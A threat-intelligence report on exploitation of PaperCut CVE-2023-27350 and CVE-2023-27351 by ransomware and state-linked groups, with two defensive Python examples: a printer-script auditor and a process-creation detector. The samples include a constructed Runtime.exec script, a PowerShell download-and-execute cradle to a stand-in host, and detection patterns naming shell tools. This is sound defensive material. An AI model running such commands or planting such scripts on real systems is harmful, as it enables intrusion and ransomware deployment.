

Over the past two months, the Cyberint research team has tracked an extensive campaign in which threat actors are actively exploiting a recently disclosed vulnerability in the PaperCut print management platform, and has identified a clear trend in the attacks and incidents linked to it.
Multiple threat actors are concentrating their efforts on the education sector, where the rate of attacks has surged by several hundred percent in recent months.
This report provides a comprehensive overview of two vulnerabilities found in the PaperCut software: CVE-2023-27350 and CVE-2023-27351. It delves into the potential consequences of these vulnerabilities and highlights the threat actors who have taken advantage of them, including notable ransomware groups such as LockBit, Bl00dy, and Clop. Furthermore, the report includes recommendations for mitigation that affected organizations can adopt to effectively address these vulnerabilities.
PaperCut is a comprehensive print management software that enables organizations to manage their printing environments effectively. It encompasses a variety of features, such as print job tracking, quotas, rules-based printing, and cost accounting. PaperCut supports both on-premise and cloud deployments and is compatible with a wide array of printers and operating systems.
PaperCut offers clients a range of products, including the distinct print management solutions known as PaperCut NG and PaperCut MF. These products are utilized by local governments, large enterprises, healthcare institutions, and educational organizations. PaperCut’s website states that its software has garnered an extensive user base of over 100 million individuals across more than 70,000 organizations worldwide.
On March 8, 2023, PaperCut released new versions of its enterprise print management software containing fixes for two vulnerabilities: CVE-2023-27350 and CVE-2023-27351. Both had been reported to the company in early January 2023.
CVE-2023-27350, reported through Trend Micro's Zero Day Initiative, is a critical vulnerability affecting both PaperCut MF and PaperCut NG installations. It allows an unauthenticated remote attacker to execute arbitrary code with SYSTEM privileges on the application server, which makes it highly impactful.
Because of its severity and ease of exploitation it carries a CVSS score of 9.8 and the highest possible score, 10, in the Argos CVE intel module.
The exploit abuses PaperCut's printer scripting feature. Once the attacker reaches the admin interface without credentials, a printer's default script template can be modified to add malicious entries; with the script sandbox bypassed, the script gets direct access to the Java runtime and can run commands on the application server itself.
Printer scripts mainly consist of hook functions that PaperCut calls later, when a print job arrives, but any code in the script's global scope executes immediately when the script is saved. A single edited printer script is therefore enough for a threat actor to achieve remote code execution.
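The distinction between hook functions and global scope is what a defender should look for when reviewing printer scripts exported from a PaperCut server. The following is an added example, not Cyberint's or PaperCut's code: it blanks comments and strings, tracks brace depth, and reports every reference to the Java runtime together with the depth at which it sits, so a reference at depth 0 (the kind that runs on save) can be told apart from one inside a hook. The identifier list and the brace-depth heuristic are constructed for this example, and the three sample scripts are constructed too; printJobHook is PaperCut's real hook name, while the actions/inputs calls in the samples are illustrative.

```python
"""Audit a PaperCut print script for Java-runtime code that runs at save time.

Added example; not Cyberint's or PaperCut's code. Print scripts are JavaScript:
hook functions run later, per job, but global-scope statements run on save.
The identifier list, depth heuristic and sample scripts are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Identifiers that reach the Java runtime from Rhino-style JavaScript, plus
# eval/Function, which can hide the same names inside string literals.
JAVA_ESCAPES = re.compile(
    r"\b(java\.lang\.Runtime|getRuntime\s*\(|ProcessBuilder|Packages\.|"
    r"importClass\s*\(|importPackage\s*\(|eval\s*\(|Function\s*\()"
)


@dataclass(frozen=True)
class Finding:
    line: int
    depth: int   # 0 = global scope (runs on save); >0 = inside a function body
    text: str


def skeleton(src: str) -> str:
    """Blank out comments and string contents, keeping every newline, so braces
    and identifiers inside them do not affect depth tracking or matching."""
    out, i, n = [], 0, len(src)
    while i < n:
        two = src[i:i + 2]
        if two == "//":                                   # line comment
            j = src.find("\n", i)
            j = n if j < 0 else j
            out.append(" " * (j - i))
            i = j
        elif two == "/*":                                 # block comment
            j = src.find("*/", i + 2)
            j = n if j < 0 else j + 2
            out.append("".join(c if c == "\n" else " " for c in src[i:j]))
            i = j
        elif src[i] in "\"'":                             # string literal
            q, j = src[i], i + 1
            while j < n and src[j] not in (q, "\n"):
                j += 2 if src[j] == "\\" else 1           # skip escaped chars
            j = min(j, n)
            if j < n and src[j] == q:
                out.append(q + " " * (j - i - 1) + q)
                i = j + 1
            else:                                         # unterminated string
                out.append(q + " " * (j - i - 1))
                i = j
        else:
            out.append(src[i])
            i += 1
    return "".join(out)


def audit_print_script(src: str) -> list[Finding]:
    """Report every Java-runtime reference with the brace depth at which it sits.
    Depth 0 means the statement executes when the script is saved."""
    findings, depth = [], 0
    original = src.split("\n")
    for lineno, line in enumerate(skeleton(src).split("\n"), start=1):
        m = JAVA_ESCAPES.search(line)
        if m:
            before = line[: m.start()]
            at_match = depth + before.count("{") - before.count("}")
            findings.append(Finding(lineno, at_match, original[lineno - 1].strip()))
        depth += line.count("{") - line.count("}")
    return findings


def runs_on_save(src: str) -> bool:
    """True when any Java-runtime reference is in global scope."""
    return any(f.depth == 0 for f in audit_print_script(src))


# Constructed: a normal script, everything inside the hook PaperCut calls per job.
BENIGN = """\
/* Constructed sample: large jobs get a comment. */
function printJobHook(inputs, actions) {
    if (inputs.job.totalPages > 50) {
        actions.job.addComment("Large job: " + inputs.job.totalPages + " pages");
    }
}
"""

# Constructed: the hook is still present, but the last two statements sit in
# global scope and therefore run the moment the script is saved.
MALICIOUS = """\
function printJobHook(inputs, actions) {
    actions.job.addComment("looks harmless");
}
var rt = java.lang.Runtime.getRuntime();
rt.exec("cmd.exe /c whoami > C:\\\\Windows\\\\Temp\\\\pc.txt");
"""

# Constructed: same runtime access, but inside the hook, so it only fires per job.
DEFERRED = """\
function printJobHook(inputs, actions) {
    var rt = java.lang.Runtime.getRuntime(); // per job, not at save
}
"""

if __name__ == "__main__":
    for name, script in (("benign", BENIGN), ("malicious", MALICIOUS), ("deferred", DEFERRED)):
        print(f"{name}: {'RUNS ON SAVE' if runs_on_save(script) else 'ok'}")
        for f in audit_print_script(script):
            print(f"  line {f.line} depth {f.depth}: {f.text}")
```

The depth-0 finding is the one that matters for this CVE; a runtime reference inside a hook is still worth a look, since it means the sandbox has been turned off, but it will not fire until a job is printed.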
Exploiting the vulnerability can serve as an entry point for further activity in the target network: lateral movement, access to and manipulation of sensitive data, persistent backdoors for future access, and ultimately ransomware deployment.
PaperCut also warned of a second, related vulnerability in the same software, CVE-2023-27351, with a CVSS score of 8.2. This bug allows an unauthenticated attacker to retrieve user information stored on customers' PaperCut MF and NG servers.
The exposed data includes usernames, full names, email addresses, department details and the card numbers associated with the affected accounts (the ID/swipe-card numbers PaperCut uses to authenticate users at printers, not payment cards).
Although CVE-2023-27351 was published alongside CVE-2023-27350 and has also been exploited, this report focuses primarily on CVE-2023-27350 because of its higher criticality and risk.
At the time CVE-2023-27350 was disclosed, a Shodan search showed approximately 1,800 publicly exposed PaperCut servers. Cyberint's recent findings indicate roughly 700 exposed servers as of this writing.
This CVE is easy to exploit and has already been observed in the wild, associated with ransomware attacks by notorious ransomware groups such as Bl00dy, Clop, and LockBit.
PaperCut officially acknowledged active exploitation in a notification on April 19, 2023, but Cyberint found evidence that exploitation had begun as early as April 13. Most targeted victims belong to the education sector, which makes up a significant portion of PaperCut's customer base. The timeline of events related to CVE-2023-27350 is outlined below:
As noted above, a simple Shodan search turned up around 1,800 potentially vulnerable PaperCut servers when the vulnerability was first disclosed. Vulnerable targets are easy to find because PaperCut's web admin interface is often exposed directly to the internet, which puts exploitation within reach of even unsophisticated threat actors.
Moreover, proof-of-concept (PoC) code, demonstrations and step-by-step guidance for the vulnerability are easy to find on the deep and dark web (Figure 2).
Cyberint also identified extensive chatter around the issue (Figure 3), which supports the conclusion that the vulnerability is fairly easy to exploit.
To date, Cyberint has identified approximately 700 potentially vulnerable PaperCut servers, 35% of which belong to the education sector. Despite the critical nature of the vulnerability and the attention it has received in the security community, many educational institutions evidently have not yet patched and updated their PaperCut systems.
This raises concerns about the security maturity of the sector, especially given the ongoing cyber-attacks against educational organizations. The sector has seen an increase in ransomware cases over the past six months, which Cyberint attributes partly to the discovery of this vulnerability.
Even if every education organization eventually patches, the longer it takes, the more time threat actors have to exploit the flaw. Patching also does not undo an earlier compromise: if a server was exploited before the update, the threat actor may already hold access to sensitive data and systems, so patched servers should be examined for signs of prior exploitation as well.
These factors, the ease of finding vulnerable servers and of exploiting the flaw (Figures 4, 5), the valuable and sensitive data held on vulnerable systems, and the potentially devastating consequences of exploitation, together attract the attention of all kinds of threat actors.
Among the ransomware and other threat actor groups that have exploited this vulnerability, notable examples include LockBit, Bl00dy, Cl0p, MuddyWater and Phosphorus. These groups stand out for how quickly they adopt new CVEs into their attack strategies, integrating public proof-of-concept exploits into their operations shortly after they appear.
In the last six months, the Cyberint research team has observed a surge in attacks targeting the education sector, with specific references to the PaperCut environment in ransomware attacks that happened before the CVE was published. Since December 2022 there has been a 178% increase in ransomware attacks targeting educational institutions. This alarming trend suggests that threat actor groups may have exploited this vulnerability prior to its official disclosure.
The LockBit Ransomware Group initially emerged in September 2019. With the shutdown of the Conti Group, LockBit became the most prominent ransomware group in 2022 and continues to maintain its position as one of the most active groups to date.
Since the beginning of 2023, LockBit has publicly claimed over 422 victims, bringing its total to more than 1,700 and cementing its position as a significant threat in the cybersecurity landscape.
LockBit primarily focuses on US and European victims, specifically targeting manufacturing, services, retail, education sectors, and more.
The Cyberint research team was able to find evidence that strongly suggests that the LockBit ransomware group has been actively capitalizing on the vulnerabilities to execute a PowerShell script, ultimately resulting in the deployment of the LockBit ransomware.
Originating in Russia, the Clop ransomware group, also known as Cl0p, emerged in February 2019. It has been actively focusing on a broad range of sectors globally, including retail, transportation, education, manufacturing, automotive, energy, financial, telecommunications, and healthcare.
In Q1 2023 Clop ranked as the second most active ransomware group worldwide, compromising new victims every week.
The Clop ransomware group claims to have begun exploiting PaperCut servers on April 13, 2023. Its primary objective was initial access to corporate networks rather than the archived documents stored on the servers.
Before deploying ransomware, Clop employed remote tools to implant Truebot malware, a known tool used by the gang. Truebot has also been associated with Clop’s mass hack targeting Fortra’s GoAnywhere file transfer tool.
Given how Clop exploited this vulnerability, and its earlier use of 0-day exploits such as the GoAnywhere MFT vulnerability (CVE-2023-0669), exploiting vulnerabilities has become Clop's modus operandi. Compared with other ransomware groups, Clop's primary initial-access method appears to be vulnerability exploitation rather than the alternatives.
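The LockBit activity (a PowerShell script run through the vulnerability) and the Clop activity (remote tools dropping Truebot) described above share one observable that a detection engineer can key on: on Windows the PaperCut application server runs as pc-app.exe under SYSTEM, and it has no reason to launch cmd.exe or PowerShell. The following is an added example, not Cyberint's, PaperCut's or any vendor's detection logic. It runs a parent/child rule over constructed process-creation records in a Sysmon Event ID 1 style; the process name pc-app.exe, the default install directories and the command-line heuristics are assumptions stated in the code, and pc-helper.exe and example.invalid are hypothetical.

```python
"""Flag command interpreters spawned by the PaperCut application server.

Added example; not Cyberint's, PaperCut's or any vendor's detection logic.
Assumptions: the server process is pc-app.exe, its helpers live under the
default PaperCut install directories, and the sample events are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

PAPERCUT_SERVER = "pc-app.exe"            # assumed PaperCut NG/MF server process name
# Assumed default install locations; adjust for non-default installs.
PAPERCUT_DIRS = ("c:\\program files\\papercut mf\\", "c:\\program files\\papercut ng\\")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
          "bitsadmin.exe", "curl.exe"}
# Command-line traits that raise severity (constructed heuristics).
SUSPICIOUS_ARGS = re.compile(
    r"(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}|downloadstring|downloadfile|"
    r"invoke-webrequest|\biwr\b|frombase64string|-w(indowstyle)?\s+hidden|"
    r"-ep\s+bypass|executionpolicy\s+bypass|\biex\b)", re.I)


@dataclass(frozen=True)
class Alert:
    severity: str     # high | medium | low
    rule: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[Alert]:
    """Return one Alert per suspicious child of pc-app.exe, in event order."""
    alerts: list[Alert] = []
    for ev in events:
        if _basename(ev.get("ParentImage", "")) != PAPERCUT_SERVER:
            continue                          # only children of the PaperCut server
        image_path = ev.get("Image", "")
        image = _basename(image_path)
        cmd = ev.get("CommandLine", "")
        if image in SHELLS:
            sev = "high" if SUSPICIOUS_ARGS.search(cmd) else "medium"
            alerts.append(Alert(sev, "papercut_server_spawns_shell", image, cmd))
        elif not image_path.lower().startswith(PAPERCUT_DIRS):
            # Not a shell, but also not one of PaperCut's own helpers under its install dir.
            alerts.append(Alert("low", "papercut_server_unexpected_child", image, cmd))
    return alerts


# Constructed process-creation records (Sysmon Event ID 1 style).
SAMPLE_EVENTS = [
    {   # constructed: a helper under the install directory, expected
        "ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
        "Image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-helper.exe",
        "CommandLine": "pc-helper.exe --render job-1042",
    },
    {   # constructed: download cradle of the kind the text attributes to LockBit
        "ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/a.ps1')\"",
    },
    {   # constructed: plain cmd.exe with no obvious tradecraft, still worth a ticket
        "ParentImage": r"C:\Program Files\PaperCut NG\server\bin\win\pc-app.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c whoami",
    },
    {   # constructed: an admin's shell with no PaperCut parent, out of scope here
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe",
    },
    {   # constructed: unknown binary in Temp launched by the server
        "ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
        "Image": r"C:\Windows\Temp\update.exe",
        "CommandLine": "update.exe",
    },
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule}: {a.image} :: {a.command_line}")
```

The rule keys on the parent process rather than on the specific tooling, so it catches the PowerShell script, the remote tools that staged Truebot, and whatever the next group uses, as long as it is launched by the compromised server process.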
The Bl00dy ransomware group initiated its operations in May 2022 and has since targeted well-known organizations across various industries using double extortion techniques.
The Bl00dy gang encrypts files on the victim's machines, appends the ".bl00dy" extension to the encrypted files and drops a ransom note on the compromised system. The group has been observed using Conti's ransomware modules.
On May 11, 2023, CISA and the FBI issued a joint advisory warning of attacks by the Bl00dy Ransomware Gang on the US Education Facilities Subsector. Bl00dy specifically exploited vulnerable PaperCut servers that education organizations had exposed to the internet.
As a result of these attacks, the Bl00dy Ransomware Gang gained unauthorized access to victim networks, leading to data exfiltration and encryption of system files. Bl00dy left ransom notes on compromised systems, demanding payment in exchange for decrypting the encrypted files.
MuddyWater is an espionage group operating within Iran’s Ministry of Intelligence and Security (MOIS).
Since at least 2017, MuddyWater has directed its efforts towards various government and private entities across sectors, including telecommunications, local government, defense, oil, and natural gas organizations.
MuddyWater focuses its targeting efforts on victims located in a wide range of regions, including the Middle East, Asia, Africa, Europe, and North America.
Phosphorus, also known as Charming Kitten, is a state-sponsored Iranian threat group that has been highly active since 2017. Its targeting aligns with the interests of Iran's Islamic Revolutionary Guard Corps, and it is known for phishing campaigns against influential individuals.
Both Iranian groups have joined the ongoing campaign against these vulnerabilities. Their exploitation has affected organizations across a range of sectors and regions, suggesting an opportunistic approach.
MuddyWater has utilized tools from previous campaigns to establish connections with its command-and-control infrastructure.
The potential for significant financial gain, and for considerable damage to organizations that have not implemented sufficient security measures, makes PaperCut's vulnerability highly attractive to exploit, which is why so many threat actors have abused it.
This vulnerability underscores the importance of patching promptly and keeping every platform up to date. However unlikely it may seem that a print management system could have such devastating consequences for an organization, an unpatched, internet-exposed server of any kind becomes an entry point when strong security measures are not in place.